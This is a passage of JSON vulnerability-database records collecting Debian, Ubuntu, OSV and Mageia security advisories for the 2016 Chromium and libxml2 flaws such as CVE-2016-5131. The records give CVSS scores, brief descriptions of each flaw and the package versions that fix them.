"impactScore": 6.0}, "published": "2016-07-31T00:00:00", "type": "osv", "title": "chromium-browser - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1704", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2022-08-10T07:11:06", "id": "OSV:DSA-3637-1", "href": "https://osv.dev/vulnerability/DSA-3637-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T07:11:17", "description": "\nSeveral vulnerabilities were discovered in libxml2, a library providing\nsupport to read, modify and write XML and HTML files. A remote attacker\ncould provide a specially crafted XML or HTML file that, when processed\nby an application using libxml2, would cause a denial-of-service against\nthe application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u4.\n\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.4+dfsg1-2.1.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.4+dfsg1-2.1.\n\n\nWe recommend that you upgrade your libxml2 packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 
5.9}, "published": "2016-12-23T00:00:00", "type": "osv", "title": "libxml2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5131", "CVE-2016-4658"], "modified": "2022-08-10T07:11:11", "id": "OSV:DSA-3744-1", "href": "https://osv.dev/vulnerability/DSA-3744-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T08:12:48", "description": "\n* [CVE-2016-4658](https://security-tracker.debian.org/tracker/CVE-2016-4658)\nNamespace nodes must be copied to avoid use-after-free errors.\n But they don't necessarily have a physical representation in a\n document, so simply disallow them in XPointer ranges.\n* [CVE-2016-5131](https://security-tracker.debian.org/tracker/CVE-2016-5131)\nThe old code would invoke the broken xmlXPtrRangeToFunction.\n range-to isn't really a function but a special kind of\n location step. 
Remove this function and always handle range-to\n in the XPath code.\n The old xmlXPtrRangeToFunction could also be abused to trigger\n a use-after-free error with the potential for remote code\n execution.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n2.8.0+dfsg1-7+wheezy7.\n\n\nWe recommend that you upgrade your libxml2 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-31T00:00:00", "type": "osv", "title": "libxml2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5131", "CVE-2016-4658"], "modified": "2022-07-21T05:54:43", "id": "OSV:DLA-691-1", "href": "https://osv.dev/vulnerability/DLA-691-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2023-05-02T16:06:38", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3637-1 
security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nJuly 31, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2016-1704 CVE-2016-1705 CVE-2016-1706 CVE-2016-1707\n CVE-2016-1708 CVE-2016-1709 CVE-2016-1710 CVE-2016-1711\n CVE-2016-5127 CVE-2016-5128 CVE-2016-5129 CVE-2016-5130\n CVE-2016-5131 CVE-2016-5132 CVE-2016-5133 CVE-2016-5134\n CVE-2016-5135 CVE-2016-5136 CVE-2016-5137\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2016-1704\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-1705\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-1706\n\n Pinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\nCVE-2016-1707\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2016-1708\n\n Adam Varsan discovered a use-after-free issue.\n\nCVE-2016-1709\n\n ChenQin discovered a buffer overflow issue in the sfntly library.\n\nCVE-2016-1710\n\n Mariusz Mlynski discovered a same-origin bypass.\n\nCVE-2016-1711\n\n Mariusz Mlynski discovered another same-origin bypass.\n\nCVE-2016-5127\n\n cloudfuzzer discovered a use-after-free issue.\n\nCVE-2016-5128\n\n A same-origin bypass issue was discovered in the v8 javascript library.\n\nCVE-2016-5129\n\n Jeonghoon Shin discovered a memory corruption issue in the v8 javascript\n library.\n\nCVE-2016-5130\n\n Widih Matar discovered a URL spoofing issue.\n\nCVE-2016-5131\n\n Nick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\nCVE-2016-5132\n\n Ben Kelly discovered a same-origin bypass.\n\nCVE-2016-5133\n\n Patch Eudor discovered an issue in proxy authentication.\n\nCVE-2016-5134\n\n Paul Stone discovered an information leak in the Proxy Auto-Config\n feature.\n\nCVE-2016-5135\n\n ShenYeYinJiu discovered a way to bypass the Content Security 
Policy.\n\nCVE-2016-5136\n\n Rob Wu discovered a use-after-free issue.\n\nCVE-2016-5137\n\n Xiaoyin Liu discovered a way to discover whether an HSTS web site had been\n visited.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 52.0.2743.82-1~deb8u1.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 52.0.2743.82-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-31T21:08:37", "type": "debian", "title": "[SECURITY] [DSA 3637-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1704", "CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", 
"CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-07-31T21:08:37", "id": "DEBIAN:DSA-3637-1:68841", "href": "https://lists.debian.org/debian-security-announce/2016/msg00215.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T22:26:54", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3637-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nJuly 31, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2016-1704 CVE-2016-1705 CVE-2016-1706 CVE-2016-1707\n CVE-2016-1708 CVE-2016-1709 CVE-2016-1710 CVE-2016-1711\n CVE-2016-5127 CVE-2016-5128 CVE-2016-5129 CVE-2016-5130\n CVE-2016-5131 CVE-2016-5132 CVE-2016-5133 CVE-2016-5134\n CVE-2016-5135 CVE-2016-5136 CVE-2016-5137\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2016-1704\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-1705\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-1706\n\n Pinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\nCVE-2016-1707\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2016-1708\n\n Adam Varsan discovered a use-after-free issue.\n\nCVE-2016-1709\n\n ChenQin discovered a buffer overflow issue in the sfntly library.\n\nCVE-2016-1710\n\n Mariusz Mlynski discovered a same-origin bypass.\n\nCVE-2016-1711\n\n Mariusz Mlynski discovered another same-origin bypass.\n\nCVE-2016-5127\n\n cloudfuzzer discovered a use-after-free issue.\n\nCVE-2016-5128\n\n A same-origin bypass issue was discovered in the v8 javascript library.\n\nCVE-2016-5129\n\n Jeonghoon Shin discovered a memory corruption issue in the v8 
javascript\n library.\n\nCVE-2016-5130\n\n Widih Matar discovered a URL spoofing issue.\n\nCVE-2016-5131\n\n Nick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\nCVE-2016-5132\n\n Ben Kelly discovered a same-origin bypass.\n\nCVE-2016-5133\n\n Patch Eudor discovered an issue in proxy authentication.\n\nCVE-2016-5134\n\n Paul Stone discovered an information leak in the Proxy Auto-Config\n feature.\n\nCVE-2016-5135\n\n ShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\nCVE-2016-5136\n\n Rob Wu discovered a use-after-free issue.\n\nCVE-2016-5137\n\n Xiaoyin Liu discovered a way to discover whether an HSTS web site had been\n visited.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 52.0.2743.82-1~deb8u1.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 52.0.2743.82-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-07-31T21:08:37", "type": "debian", "title": "[SECURITY] [DSA 3637-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1704", "CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-07-31T21:08:37", "id": "DEBIAN:DSA-3637-1:92B2C", "href": "https://lists.debian.org/debian-security-announce/2016/msg00215.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T22:10:04", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3744-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 23, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libxml2\nCVE ID : CVE-2016-4658 CVE-2016-5131\nDebian Bug : 840553 840554\n\nSeveral vulnerabilities were discovered in libxml2, a library providing\nsupport to read, modify and write XML and HTML files. 
A remote attacker\ncould provide a specially crafted XML or HTML file that, when processed\nby an application using libxml2, would cause a denial-of-service against\nthe application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u4.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.4+dfsg1-2.1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.4+dfsg1-2.1.\n\nWe recommend that you upgrade your libxml2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-23T18:31:42", "type": "debian", "title": "[SECURITY] [DSA 3744-1] libxml2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", 
"CVE-2016-5131"], "modified": "2016-12-23T18:31:42", "id": "DEBIAN:DSA-3744-1:AE7DC", "href": "https://lists.debian.org/debian-security-announce/2016/msg00328.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-02T15:57:27", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3744-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 23, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libxml2\nCVE ID : CVE-2016-4658 CVE-2016-5131\nDebian Bug : 840553 840554\n\nSeveral vulnerabilities were discovered in libxml2, a library providing\nsupport to read, modify and write XML and HTML files. A remote attacker\ncould provide a specially crafted XML or HTML file that, when processed\nby an application using libxml2, would cause a denial-of-service against\nthe application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u4.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.4+dfsg1-2.1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.4+dfsg1-2.1.\n\nWe recommend that you upgrade your libxml2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 
"baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-23T18:31:42", "type": "debian", "title": "[SECURITY] [DSA 3744-1] libxml2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131"], "modified": "2016-12-23T18:31:42", "id": "DEBIAN:DSA-3744-1:D44DC", "href": "https://lists.debian.org/debian-security-announce/2016/msg00328.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-23T21:47:36", "description": "Package : libxml2\nVersion : 2.8.0+dfsg1-7+wheezy7\nCVE ID : CVE-2016-4658 CVE-2016-5131\n\nCVE-2016-4658\n Namespace nodes must be copied to avoid use-after-free errors.\n But they don't necessarily have a physical representation in a\n document, so simply disallow them in XPointer ranges.\n\nCVE-2016-5131\n The old code would invoke the broken xmlXPtrRangeToFunction.\n range-to isn't really a function but a special kind of\n location step. 
Remove this function and always handle range-to\n in the XPath code.\n The old xmlXPtrRangeToFunction could also be abused to trigger\n a use-after-free error with the potential for remote code\n execution.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n2.8.0+dfsg1-7+wheezy7.\n\nWe recommend that you upgrade your libxml2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-31T17:09:55", "type": "debian", "title": "[SECURITY] [DLA 691-1] libxml2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131"], "modified": "2016-10-31T17:09:55", "id": "DEBIAN:DLA-691-1:EF9E0", "href": "https://lists.debian.org/debian-lts-announce/2016/10/msg00048.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-06-03T15:48:46", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n 
* oxide-qt \\- Web browser engine for Qt (QML plugin)\n\nMultiple security issues were discovered in Chromium. If a user were \ntricked into opening a specially crafted website, an attacker could \npotentially exploit these to read uninitialized memory, cause a denial \nof service (application crash) or execute arbitrary code. (CVE-2016-1705)\n\nIt was discovered that the PPAPI implementation does not validate the \norigin of IPC messages to the plugin broker process. A remote attacker \ncould potentially exploit this to bypass sandbox protection mechanisms. \n(CVE-2016-1706)\n\nIt was discovered that Blink does not prevent window creation by a \ndeferred frame. A remote attacker could potentially exploit this to bypass \nsame origin restrictions. (CVE-2016-1710)\n\nIt was discovered that Blink does not disable frame navigation during a \ndetach operation on a DocumentLoader object. A remote attacker could \npotentially exploit this to bypass same origin restrictions. \n(CVE-2016-1711)\n\nA use-after-free was discovered in Blink. If a user were tricked into \nopening a specially crafted website, an attacker could potentially exploit \nthis to cause a denial of service via renderer process crash, or execute \narbitrary code. (CVE-2016-5127)\n\nIt was discovered that objects.cc in V8 does not prevent API interceptors \nfrom modifying a store target without setting a property. A remote \nattacker could potentially exploit this to bypass same origin \nrestrictions. (CVE-2016-5128)\n\nA memory corruption was discovered in V8. If a user were tricked into \nopening a specially crafted website, an attacker could potentially exploit \nthis to cause a denial of service via renderer process crash, or execute \narbitrary code. (CVE-2016-5129)\n\nA security issue was discovered in Chromium. A remote attacker could \npotentially exploit this to spoof the currently displayed URL. \n(CVE-2016-5130)\n\nA use-after-free was discovered in libxml. 
If a user were tricked into \nopening a specially crafted website, an attacker could potentially exploit \nthis to cause a denial of service via renderer process crash, or execute \narbitrary code. (CVE-2016-5131)\n\nThe Service Workers implementation in Chromium does not properly implement \nthe Secure Contexts specification during decisions about whether to \ncontrol a subframe. A remote attacker could potentially exploit this to \nbypass same origin restrictions. (CVE-2016-5132)\n\nIt was discovered that Chromium mishandles origin information during proxy \nauthentication. A machine-in-the-middle attacker could potentially exploit this \nto spoof a proxy authentication login prompt. (CVE-2016-5133)\n\nIt was discovered that the Proxy Auto-Config (PAC) feature in Chromium \ndoes not ensure that URL information is restricted to a scheme, host and \nport. A remote attacker could potentially exploit this to obtain sensitive \ninformation. (CVE-2016-5134)\n\nIt was discovered that Blink does not consider referrer-policy information \ninside an HTML document during a preload request. A remote attacker could \npotentially exploit this to bypass Content Security Policy (CSP) \nprotections. (CVE-2016-5135)\n\nIt was discovered that the Content Security Policy (CSP) implementation in \nBlink does not apply http :80 policies to https :443 URLs. A remote \nattacker could potentially exploit this to determine whether a specific \nHSTS web site has been visited by reading a CSP report. 
(CVE-2016-5137)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-08-05T00:00:00", "type": "ubuntu", "title": "Oxide vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5137"], "modified": "2016-08-05T00:00:00", "id": "USN-3041-1", "href": "https://ubuntu.com/security/notices/USN-3041-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-03T15:46:18", "description": "## Releases\n\n * Ubuntu 16.10 \n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * libxml2 \\- GNOME XML library\n\nIt was discovered that libxml2 incorrectly handled format strings. If a \nuser or automated system were tricked into opening a specially crafted \ndocument, an attacker could possibly cause libxml2 to crash, resulting in a \ndenial of service. This issue only affected Ubuntu 12.04 LTS, Ubuntu 14.04 \nLTS, and Ubuntu 16.04 LTS. 
(CVE-2016-4448)\n\nIt was discovered that libxml2 incorrectly handled certain malformed \ndocuments. If a user or automated system were tricked into opening a \nspecially crafted document, an attacker could cause libxml2 to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2016-4658)\n\nNick Wellnhofer discovered that libxml2 incorrectly handled certain \nmalformed documents. If a user or automated system were tricked into \nopening a specially crafted document, an attacker could cause libxml2 to \ncrash, resulting in a denial of service, or possibly execute arbitrary \ncode. (CVE-2016-5131)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-16T00:00:00", "type": "ubuntu", "title": "libxml2 vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4448", "CVE-2016-4658", "CVE-2016-5131"], "modified": "2017-03-16T00:00:00", "id": "USN-3235-1", "href": "https://ubuntu.com/security/notices/USN-3235-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2023-06-03T15:12:47", "description": "Multiple 
unspecified vulnerabilities in chromium before 52.0.2743.82 allow attackers to cause a denial of service or possibly have other impact via unknown vectors. (CVE-2016-1705) The PPAPI implementation in Chromium before 52.0.2743.82 does not validate the origin of IPC messages to the plugin broker process that should have come from the browser process, which allows remote attackers to bypass a sandbox protection mechanism via an unexpected message type, related to broker_process_dispatcher.cc, ppapi_plugin_process_host.cc, ppapi_thread.cc, and render_frame_message_filter.cc. (CVE-2016-1706) The Chrome Web Store inline-installation implementation in the Extensions subsystem in Chromium before 52.0.2743.82 does not properly consider object lifetimes during progress observation, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted web site. (CVE-2016-1708) Heap-based buffer overflow in the ByteArray::Get method in data/byte_array.cc in sfntly before 2016-06-10, as used in Chromium before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted SFNT font. 